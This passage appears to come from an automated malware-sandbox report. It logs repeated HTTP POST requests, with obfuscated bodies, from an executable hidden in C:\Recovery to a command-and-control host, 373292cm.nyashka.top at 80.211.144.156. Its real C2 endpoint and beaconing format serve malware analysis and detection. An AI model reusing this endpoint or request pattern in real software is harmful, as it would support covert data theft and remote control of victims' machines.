                                    Aug 25, 2024 15:44:27.279417992 CEST2516OUTData Raw: 5a 51 5c 52 54 46 51 5b 5b 5f 5a 51 59 53 58 53 57 5e 5d 59 57 59 53 54 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQ\RTFQ[[_ZQYSXSW^]YWYST\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-, /6-$ %]),?:+Y#? 4"/+_ 0*/.&F$.Y/5
                                    Aug 25, 2024 15:44:27.587806940 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:27.719718933 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    67192.168.2.64979480.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:27.848227978 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:28.201327085 CEST2516OUTData Raw: 5a 51 5c 55 54 43 54 5c 5b 5f 5a 51 59 52 58 52 57 5a 5d 59 57 5a 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQ\UTCT\[_ZQYRXRWZ]YWZS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V..#!=?#3%]=+("?>+\7<041'<9" 1/&F$.Y/1
                                    Aug 25, 2024 15:44:28.521579027 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:28.720983028 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:28 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    68192.168.2.64979580.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:29.147320032 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:29.498047113 CEST2516OUTData Raw: 5a 56 5c 51 51 47 51 59 5b 5f 5a 51 59 5e 58 51 57 50 5d 59 57 5a 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZV\QQGQY[_ZQY^XQWP]YWZS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.Y/3;!>44V:*=/<.-?'] #Q#8(:'\4=,&F$.Y/


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    69192.168.2.64979680.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:29.739677906 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:30.091733932 CEST1840OUTData Raw: 5f 53 5c 56 51 44 51 5d 5b 5f 5a 51 59 55 58 56 57 59 5d 58 57 5d 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _S\VQDQ][_ZQYUXVWY]XW]SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-/3+!=7 5]>$>>? 7< 41<#Y##5_..&F$.Y/-
                                    Aug 25, 2024 15:44:30.425194979 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:30.562266111 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:29 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 55 3d 26 29 04 25 5d 3b 0d 30 0a 2e 1f 2a 13 23 12 2b 2d 2a 07 27 38 07 1a 25 3e 28 13 24 02 2d 1f 2b 10 36 57 24 2c 2f 59 2e 24 2b 5d 0c 13 22 58 20 04 2d 00 26 2f 2c 5a 29 06 33 15 21 3c 07 00 3c 04 0f 16 2b 01 2c 10 3e 29 0a 02 2b 5c 29 0a 3b 01 29 5b 2f 33 2e 55 37 04 2b 52 0d 11 24 10 2b 03 31 54 2a 2d 37 17 21 28 3c 00 24 13 21 0f 26 0c 0f 0f 30 39 27 00 31 32 21 12 24 21 2d 57 32 15 3d 06 25 11 22 08 36 32 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &U=&)%];0.*#+-*'8%>($-+6W$,/Y.$+]"X -&/,Z)3!<<+,>)+\);)[/3.U7+R$+1T*-7!(<$!&09'12!$!-W2=%"62#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    70192.168.2.64979780.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:29.866861105 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:30.216778994 CEST2516OUTData Raw: 5a 55 5c 51 54 43 54 50 5b 5f 5a 51 59 53 58 55 57 58 5d 5a 57 51 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZU\QTCTP[_ZQYSXUWX]ZWQSU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.\/'C!3"#5Y)7<=&<.?[4+S#"#()( %\;.&F$.Y/5
                                    Aug 25, 2024 15:44:30.563822031 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:30.703711033 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:30 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    71192.168.2.64979880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:30.830689907 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:31.185538054 CEST2516OUTData Raw: 5f 5c 59 50 54 41 51 5d 5b 5f 5a 51 59 50 58 54 57 5b 5d 58 57 58 53 59 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _\YPTAQ][_ZQYPXTW[]XWXSY\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.85=349\==<<-%(-,7/,4,*);#!\,&F$.Y/
                                    Aug 25, 2024 15:44:31.527590036 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:31.668103933 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    72192.168.2.64979980.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:31.798132896 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:32.156503916 CEST2516OUTData Raw: 5f 5c 59 54 54 46 54 59 5b 5f 5a 51 59 56 58 5f 57 5b 5d 5f 57 59 53 58 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _\YTTFTY[_ZQYVX_W[]_WYSX\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-; $!- #V!Y+='<5+=;Y#/(7;(:#"3";&F$.Y/!
                                    Aug 25, 2024 15:44:32.472733021 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:32.603701115 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    73192.168.2.64980080.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:32.736696005 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:33.091747999 CEST2516OUTData Raw: 5f 52 5c 5e 54 46 54 5b 5b 5f 5a 51 59 51 58 56 57 51 5d 5c 57 5b 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _R\^TFT[[_ZQYQXVWQ]\W[S]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.,A!['"#!*+-=^?=(",$#13()( 1X,>&F$.Y/=
                                    Aug 25, 2024 15:44:33.437525034 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:33.573899984 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    74192.168.2.64980180.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:33.713736057 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:34.061054945 CEST2516OUTData Raw: 5f 55 5c 5e 54 49 54 58 5b 5f 5a 51 59 52 58 56 57 5d 5d 5a 57 50 53 58 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _U\^TITX[_ZQYRXVW]]ZWPSX\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.]8'5[$]739==(]+>"(>?#V W P(_(#\;.&F$.Y/1
                                    Aug 25, 2024 15:44:34.378850937 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:34.506130934 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    75192.168.2.64980280.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:34.624799967 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:34.982395887 CEST2516OUTData Raw: 5a 51 5c 54 51 45 54 5c 5b 5f 5a 51 59 51 58 56 57 5d 5d 5b 57 5a 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQ\TQET\[_ZQYQXVW]][WZSU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-.#$5Y4)+=(<=![(?4<7S 1<W(_?\70Y/&F$.Y/=
                                    Aug 25, 2024 15:44:35.290450096 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:35.493910074 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    76192.168.2.64980380.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:35.585855961 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    77192.168.2.64980480.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:35.624265909 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:35.982466936 CEST2516OUTData Raw: 5a 55 59 54 54 44 54 58 5b 5f 5a 51 59 5f 58 5f 57 51 5d 5c 57 58 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZUYTTDTX[_ZQY_X_WQ]\WXS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-/#3E!=<X 3=X)>.9+?4Q#,+_84V=/&F$.Y/
                                    Aug 25, 2024 15:44:36.290426970 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:36.418219090 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:35 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    78192.168.2.64980580.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:36.546608925 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:36.913373947 CEST2516OUTData Raw: 5f 53 5c 52 54 41 51 5c 5b 5f 5a 51 59 53 58 51 57 59 5d 5d 57 5e 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _S\RTAQ\[_ZQYSXQWY]]W^SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.],U#"43!>,]?-[<= #41(P+<46/>&F$.Y/5
                                    Aug 25, 2024 15:44:37.247601986 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:37.379519939 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:36 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    79192.168.2.64980680.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:37.506937027 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:37.857589960 CEST2516OUTData Raw: 5f 53 5c 5e 51 44 51 5a 5b 5f 5a 51 59 5f 58 54 57 5f 5d 5b 57 5b 53 59 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _S\^QDQZ[_ZQY_XTW_][W[SY\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.Y8D5841X*7(>5^(.?X#<420<Y739X;>&F$.Y/
                                    Aug 25, 2024 15:44:38.172514915 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:38.374134064 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    80192.168.2.64980780.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:38.508047104 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:38.857403040 CEST2516OUTData Raw: 5a 50 59 54 54 48 51 5a 5b 5f 5a 51 59 5e 58 5f 57 51 5d 5c 57 5a 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZPYTTHQZ[_ZQY^X_WQ]\WZS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.^,?D![ #3:>-$Y(X%+= #470V(<" _,>&F$.Y/
                                    Aug 25, 2024 15:44:39.177469015 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:39.378660917 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    81192.168.2.64980880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:39.627537966 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:39.982346058 CEST2516OUTData Raw: 5a 56 5c 5e 54 49 54 50 5b 5f 5a 51 59 55 58 57 57 5f 5d 59 57 5e 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZV\^TITP[_ZQYUXWW_]YW^SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.X;3C!-87)[ <"(\7<!2#(_(4*8>&F$.Y/-
                                    Aug 25, 2024 15:44:40.302073002 CEST25INHTTP/1.1 100 Continue
